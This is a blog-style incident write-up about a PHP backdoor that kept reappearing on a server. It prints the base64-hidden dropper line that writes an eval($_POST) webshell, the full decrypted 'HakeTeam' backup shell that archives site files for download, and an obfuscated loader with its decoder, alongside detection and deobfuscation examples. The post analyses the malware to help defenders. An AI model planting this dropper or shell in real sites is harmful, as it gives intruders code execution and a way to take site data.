
A stealthy PHP one-line backdoor, and an encoded ThinkPHP-framework program (base64_decode)

Date: 2021-07-01 10:21:17


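Today a customer's server kept getting a one-line backdoor written to it, and the file came back every time it was deleted. It turned out that the following code had been added to the application; pay attention to the arguments of the base64_decode function.

The file that kept being written to the server was:
mm.php
with the content:

Code: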

<?eval($_POST[c]);?>

In the end, the first line of one of the files turned out to be the following code:

Code:

fputs(fopen(base64_decode("bW0ucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=")); 
base64_decode("bW0ucGhw") //mm.php 
base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=") // <?eval($_POST[c]);?>

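This way, mm.php is created automatically whenever any of these files is accessed.
If you find mm.php and delete it, it will simply come back later. This is getting nastier and nastier~
Related content below:

Code: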

PD9ldmFs //base64_encode("<?eval"); 
ZXZhbA== //base64_encode("eval");
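
An added example (not part of the original article): searching for the fixed strings above only finds a payload whose bytes sit at the same 3-byte alignment, so this Python sketch decodes every base64-looking literal in a PHP file and flags the ones that decode to PHP code or a .php file name. The marker list, function names and sample file are assumptions made for illustration.

```python
import base64
import binascii
import re

# Quoted literals of 8+ characters drawn from the base64 alphabet.
B64_LITERAL = re.compile(r"""["']([A-Za-z0-9+/]{8,}={0,2})["']""")
# Byte strings that have no business hiding inside an encoded literal.
SUSPICIOUS = (b"<?", b"eval(", b"assert(", b"$_POST", b"$_REQUEST", b"$_GET", b".php")


def decode_literal(text):
    """Return the decoded bytes of a base64 literal, or None if it does not decode."""
    try:
        return base64.b64decode(text + "=" * (-len(text) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None


def scan_php_source(source):
    """Return (line_no, literal, decoded_text, markers) for every flagged literal."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for match in B64_LITERAL.finditer(line):
            decoded = decode_literal(match.group(1))
            if decoded is None:
                continue
            markers = [m.decode() for m in SUSPICIOUS if m in decoded]
            if markers:
                findings.append((line_no, match.group(1), decoded.decode("latin-1"), markers))
    return findings


# Constructed sample: the injected line from this page, a harmless literal, and the
# same payload shifted by one byte so its encoding no longer contains "PD9ldmFs".
SHIFTED = base64.b64encode(b" <?eval($_POST[c]);?>").decode()
SAMPLE = "\n".join([
    "<?php",
    'fputs(fopen(base64_decode("bW0ucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4="));',
    '$greeting = base64_decode("aGVsbG8gd29ybGQ=");',
    f'$x = base64_decode("{SHIFTED}");',
])

if __name__ == "__main__":
    for line_no, literal, decoded, markers in scan_php_source(SAMPLE):
        print(f"line {line_no}: {literal!r} -> {decoded!r} {markers}")
```

Run over a web root, every hit still needs a manual look, since legitimate code occasionally embeds encoded templates.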

An encrypted file from the ThinkPHP framework (sgcms) also turned up, with the following content:

Code:

<?php // Code By isosky www.nbst.org 
$OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=12308;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('...')));return;?> 


After decryption it reads:

Code:

<?php 
echo '<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"> 
<title>HakeTeam Website Backup V1.0 Beta - ';echo getenv('HTTP_HOST');;echo '</title> 
<style type="text/css"> 
body,p,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th,td{ 
margin:0;padding:0; 
} 
body { 
background:#EBEBED; 
color:#333; 
font-family:"Arial",Microsoft YaHei,Verdana,Helvetica,Arial,Sans-Serif; 
font-size:14px; 
} 
.textfield,textarea { 
border:1px solid green; 
font-size:14px; 
padding:2px; 
} 
.textfield:focus,textarea:focus { 
border-color:#F1CA7E; 
} 
.button { 
font-size:14px; 
text-decoration:none; 
margin-top:5px; 
background:#F5F5F5; 
border:1px solid green; 
color:#000; 
padding:2px 5px; 
} 
.button:hover { 
text-decoration:none; 
background:#EEE; 
border:1px solid #F1CA7E; 
color:#000; 
} 
pre { 
border:1px #ccc solid; 
line-height:18px; 
overflow:auto; 
word-wrap:break-word; 
max-height:220px; 
margin:4px; 
padding:4px 8px; 
} 
</style> 
</head> 
<form action="" method="post" name="postform"> 
<p align="left" class="searchbox"> 
'; 
ini_set('memory_limit','2048M'); 
echo "<pre> ---------------------------------------------- 
[<font color=#00BB00>*</font>]HakeTeam PHP Website Backup Shell V1.0 Beta 
[<font color=#00BB00>*</font>]Forum:http://www.hake.cc 
[<font color=#00BB00>*</font>]isosky's Blog:www.nbst.org 
---------------------------------------------- 
File List:</pre>"; 
$fdir = opendir('./'); 
while($file=readdir($fdir)) 
{ 
if($file=='.'||$file=='..') 
continue; 
echo "<input name='dfile[]' type='checkbox' value='$file' ".($file==basename(__FILE__)?'':'checked').'> '; 
if(is_file($file)) 
{ 
echo "<font face=\"wingdings\" size=\"5\">2</font>  $file<br>"; 
} 
else 
{ 
echo "<font face=\"wingdings\" size=\"5\">0</font> $file<br>"; 
} 
} 
;echo ' 
FileType: 
<input name="filetype" type="text" id="filetype" class="textfield" value="" size="50"> 
(Blank for all,use "|" to separate,e.g.:php|html|jpg) <br /> 
Backup Directory: 
<input name="todir" type="text" id="todir" class="textfield" value="iso_backup" size="41"> 
(Blank for this directory,use relative url,and you must be able to write file) 
<br> 
Backup Name: 
<input name="zipname" type="text" id="zipname" class="textfield" value="iso.zip" size="44"> 
(.zip type file) 
<br> 
<br> 
<input name="backup" type="hidden" id="backup" value="dozip"> 
<input type="submit" name="Submit" class="button" value="let\'s go!"> 
<p align="center"> 
<a href="http://nbst.org"><img src="http://nbst.org/logo.png" border="0"></a></p> 
<p> 
'; 
set_time_limit(0); 
class PHPzip 
{ 
var $file_count = 0 ; 
var $datastr_len = 0; 
var $dirstr_len = 0; 
var $filedata = ''; 
var $gzfilename; 
var $fp; 
var $dirstr=''; 
var $filefilters = array(); 
function SetFileFilter($filetype) 
{ 
$this->filefilters = explode('|',$filetype); 
} 
function unix2DosTime($unixtime = 0) 
{ 
$timearray = ($unixtime == 0) ?getdate() : getdate($unixtime); 
if ($timearray['year'] <1980) 
{ 
$timearray['year'] = 1980; 
$timearray['mon'] = 1; 
$timearray['mday'] = 1; 
$timearray['hours'] = 0; 
$timearray['minutes'] = 0; 
$timearray['seconds'] = 0; 
} 
return (($timearray['year'] -1980) <<25) |($timearray['mon'] <<21) |($timearray['mday'] <<16) |($timearray['hours'] <<11) |($timearray['minutes'] <<5) |($timearray['seconds'] >>1); 
} 
function startfile($path = 'dodo.zip') 
{ 
$this->gzfilename=$path; 
$mypathdir=array(); 
do 
{ 
$mypathdir[] = $path = dirname($path); 
}while($path != '.'); 
@end($mypathdir); 
do 
{ 
$path = @current($mypathdir); 
@mkdir($path); 
}while(@prev($mypathdir)); 
if($this->fp=@fopen($this->gzfilename,'w')) 
{ 
return true; 
} 
return false; 
} 
function addfile($data,$name) 
{ 
$name = str_replace('\\','/',$name); 
if(strrchr($name,'/')=='/') 
return $this->adddir($name); 
if(!empty($this->filefilters)) 
{ 
if (!in_array(end(explode('.',$name)),$this->filefilters)) 
{ 
return; 
} 
} 
$dtime = dechex($this->unix2DosTime()); 
$hexdtime = '\x'.$dtime[6] .$dtime[7] .'\x'.$dtime[4] .$dtime[5] .'\x'.$dtime[2] .$dtime[3] .'\x'.$dtime[0] .$dtime[1]; 
eval('$hexdtime = "'.$hexdtime .'";'); 
$unc_len = strlen($data); 
$crc = crc32($data); 
$zdata = gzcompress($data); 
$c_len = strlen($zdata); 
$zdata = substr(substr($zdata,0,strlen($zdata) -4),2); 
$datastr = "\x50\x4b\x03\x04"; 
$datastr .= "\x14\x00"; 
$datastr .= "\x00\x00"; 
$datastr .= "\x08\x00"; 
$datastr .= $hexdtime; 
$datastr .= pack('V',$crc); 
$datastr .= pack('V',$c_len); 
$datastr .= pack('V',$unc_len); 
$datastr .= pack('v',strlen($name)); 
$datastr .= pack('v',0); 
$datastr .= $name; 
$datastr .= $zdata; 
$datastr .= pack('V',$crc); 
$datastr .= pack('V',$c_len); 
$datastr .= pack('V',$unc_len); 
fwrite($this->fp,$datastr); 
$my_datastr_len = strlen($datastr); 
unset($datastr); 
$dirstr = "\x50\x4b\x01\x02"; 
$dirstr .= "\x00\x00"; 
$dirstr .= "\x14\x00"; 
$dirstr .= "\x00\x00"; 
$dirstr .= "\x08\x00"; 
$dirstr .= $hexdtime; 
$dirstr .= pack('V',$crc); 
$dirstr .= pack('V',$c_len); 
$dirstr .= pack('V',$unc_len); 
$dirstr .= pack('v',strlen($name) ); 
$dirstr .= pack('v',0 ); 
$dirstr .= pack('v',0 ); 
$dirstr .= pack('v',0 ); 
$dirstr .= pack('v',0 ); 
$dirstr .= pack('V',32 ); 
$dirstr .= pack('V',$this->datastr_len ); 
$dirstr .= $name; 
$this->dirstr .= $dirstr; 
$this ->file_count ++; 
$this ->dirstr_len += strlen($dirstr); 
$this ->datastr_len += $my_datastr_len; 
} 
function adddir($name) 
{ 
$name = str_replace("\\",'/',$name); 
$datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$datastr .= pack('V',0).pack('V',0).pack('V',0).pack('v',strlen($name) ); 
$datastr .= pack('v',0 ).$name.pack('V',0).pack('V',0).pack('V',0); 
fwrite($this->fp,$datastr); 
$my_datastr_len = strlen($datastr); 
unset($datastr); 
$dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$dirstr .= pack('V',0).pack('V',0).pack('V',0).pack('v',strlen($name) ); 
$dirstr .= pack('v',0 ).pack('v',0 ).pack('v',0 ).pack('v',0 ); 
$dirstr .= pack('V',16 ).pack('V',$this->datastr_len).$name; 
$this->dirstr .= $dirstr; 
$this ->file_count ++; 
$this ->dirstr_len += strlen($dirstr); 
$this ->datastr_len += $my_datastr_len; 
} 
function createfile() 
{ 
$endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00". 
pack('v',$this ->file_count) . 
pack('v',$this ->file_count) . 
pack('V',$this ->dirstr_len) . 
pack('V',$this ->datastr_len) . 
"\x00\x00"; 
fwrite($this->fp,$this->dirstr.$endstr); 
fclose($this->fp); 
} 
} 
if(!trim($_REQUEST[zipname])) 
$_REQUEST[zipname] = 'dodozip.zip'; 
else 
$_REQUEST[zipname] = trim($_REQUEST[zipname]); 
if(!strrchr(strtolower($_REQUEST[zipname]),'.')=='.zip') 
$_REQUEST[zipname] .= '.zip'; 
$_REQUEST[todir] = str_replace('\\','/',trim($_REQUEST[todir])); 
if(!strrchr(strtolower($_REQUEST[todir]),'/')=='/') 
$_REQUEST[todir] .= '/'; 
if($_REQUEST[todir]=='/') 
$_REQUEST[todir] = './'; 
function listfiles($dir='.') 
{ 
global $dodozip; 
$sub_file_num = 0; 
if(is_file("$dir")) 
{ 
if(realpath($dodozip ->gzfilename)!=realpath("$dir")) 
{ 
$dodozip ->addfile(implode('',file("$dir")),"$dir"); 
return 1; 
} 
return 0; 
} 
$handle=opendir("$dir"); 
while ($file = readdir($handle)) 
{ 
if($file=='.'||$file=='..') 
continue; 
if(is_dir("$dir/$file")) 
{ 
$sub_file_num += listfiles("$dir/$file"); 
} 
else 
{ 
if(realpath($dodozip ->gzfilename)!=realpath("$dir/$file")) 
{ 
$dodozip ->addfile(implode('',file("$dir/$file")),"$dir/$file"); 
$sub_file_num ++; 
} 
} 
} 
closedir($handle); 
if(!$sub_file_num) 
$dodozip ->addfile('',"$dir/"); 
return $sub_file_num; 
} 
function num_bitunit($num) 
{ 
$bitunit=array(' B',' KB',' MB',' GB'); 
for($key=0;$key<count($bitunit);$key++) 
{ 
if($num>=pow(2,10*$key)-1) 
{ 
$num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]"; 
} 
} 
return $num_bitunit_str; 
} 
if(is_array($_REQUEST[dfile])) 
{ 
$dodozip = new PHPzip; 
if($_REQUEST['filetype'] != NULL) 
$dodozip ->SetFileFilter($_REQUEST['filetype']); 
if($dodozip ->startfile("$_REQUEST[todir]$_REQUEST[zipname]")) 
{ 
echo 'Working,Please wait...<br><br>'; 
$filenum = 0; 
foreach($_REQUEST[dfile] as $file) 
{ 
if(is_file($file)) 
{ 
if(!empty($dodozip ->filefilters)) 
if (!in_array(end(explode('.',$file)),$dodozip ->filefilters)) 
continue; 
echo "<font face=\"wingdings\" size=\"5\">2</font>  $file<br>"; 
} 
else 
{ 
echo "<font face=\"wingdings\" size=\"5\">0</font> $file<br>"; 
} 
$filenum += listfiles($file); 
} 
$dodozip ->createfile(); 
echo "<br>success,For $filenum files.Url:<a href='$_REQUEST[todir]$_REQUEST[zipname]' _fcksavedurl='$_REQUEST[todir]$_REQUEST[zipname]'>$_REQUEST[todir]$_REQUEST[zipname] (".num_bitunit(filesize("$_REQUEST[todir]$_REQUEST[zipname]")).')</a>'; 
} 
else 
{ 
echo "$_REQUEST[todir]$_REQUEST[zipname] Error,Unable to write file.<br>"; 
} 
} 
;echo ' 
</form> 
</body> 
</html> 
';?>


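This is PHP code for packing files into a zip archive. These scumbags will use any trick to hack other people's websites; truly disgusting~~
Below is a ThinkPHP framework (sgcms) decryption program written by an expert:

Code: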

<?php 
// This file is protected by sgcms & provided under license. Copyright(C) 2007-2010 www.sgcms.cn, All rights reserved. 
$OOO0O0O00=__FILE__; 
$OOO000000=urldecode('th6sbehqla4co_sadfpnr'); 
$OO00O0000=21496; 
$OOO0000O0=$OOO000000{4}. 
$OOO000000{9}.$OOO000000{3}.$OOO000000{5}; 
$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16}; 
$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5}; 
$O0O0000O0='OOO0000O0'; 
eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwM...

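Clearly, some PHP obfuscation tool was used to obfuscate it. A quick Google search solved the problem; this is posted for the convenience of anyone who runs into the same issue.
Decrypting the PHP file:

Code: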

<?php 
$filename="GlobalAction.class.php"; // file to decode 
$lines = file($filename); // lines 0, 1, 2 
// first base64 decode 
$content=""; 
if(preg_match("/O0O0000O0\('.*'\)/",$lines[1],$y)) 
{ 
$content=str_replace("O0O0000O0('","",$y[0]); 
$content=str_replace("')","",$content); 
$content=base64_decode($content); 
} 
// find the key in the content produced by the first base64 decode 
$decode_key=""; 
if(preg_match("/\),'.*',/",$content,$k)) 
{ 
$decode_key=str_replace("),'","",$k[0]); 
$decode_key=str_replace("',","",$decode_key); 
} 
// find the length to cut off (used as the substr offset below) 
$str_length=0; 
if(preg_match("/,\d*\),/",$content,$k)) 
{ 
$str_length=str_replace("),","",$k[0]); 
$str_length=(int)str_replace(",","",$str_length); 
} 
// cut the encrypted payload out of the file 
$Secret=substr($lines[2],$str_length); 
//echo $Secret; 
// restore the ciphertext directly and output it 
echo "<?php\n".base64_decode(strtr($Secret,$decode_key, 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')). "?>"; 
?>
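
An added example (not from the original article or the quoted decoder): the loader line can be analysed without running any of the PHP. This Python sketch resolves the urldecode() lookup table and the index concatenations as plain data, which shows that the obfuscated variable holds the name base64_decode, and then undoes the strtr-plus-base64 layer. The function names are hypothetical, and the shuffled alphabet and ciphertext are constructed sample values, not taken from a real sgcms file.

```python
import base64
import re
from urllib.parse import unquote

STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
INDEX = re.compile(r"\$(\w+)\{(\d+)\}")
ASSIGN = re.compile(r"\$(\w+)(\.?=)((?:\$\w+\{\d+\}\.?)+);")


def resolve_loader(php_line):
    """Treat the lookup table and index concatenations as data; return all variables."""
    env = {}
    table = re.search(r"\$(\w+)=urldecode\('([^']*)'\)", php_line)
    env[table.group(1)] = unquote(table.group(2))
    for name, op, expr in ASSIGN.findall(php_line):
        value = "".join(env[var][int(i)] for var, i in INDEX.findall(expr))
        env[name] = env.get(name, "") + value if op == ".=" else value
    return env


def strtr_base64_decode(secret, key):
    """Map the shuffled alphabet `key` back to the standard one, then base64-decode."""
    return base64.b64decode(secret.translate(str.maketrans(key, STD_ALPHABET)))


# Loader prefix as shown on this page (the eval payload is omitted).
LOADER = (
    "$OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f"
    "%5f%73%61%64%66%70%6e%72');$OO00O0000=12308;"
    "$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};"
    "$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};"
    "$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};"
)
# Constructed key and ciphertext for the second layer (a rotated alphabet).
KEY = STD_ALPHABET[13:] + STD_ALPHABET[:13]
SECRET = base64.b64encode(b"echo 'constructed sample';").decode().translate(
    str.maketrans(STD_ALPHABET, KEY))

if __name__ == "__main__":
    print(resolve_loader(LOADER)["OOO0000O0"])
    print(strtr_base64_decode(SECRET, KEY))
```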
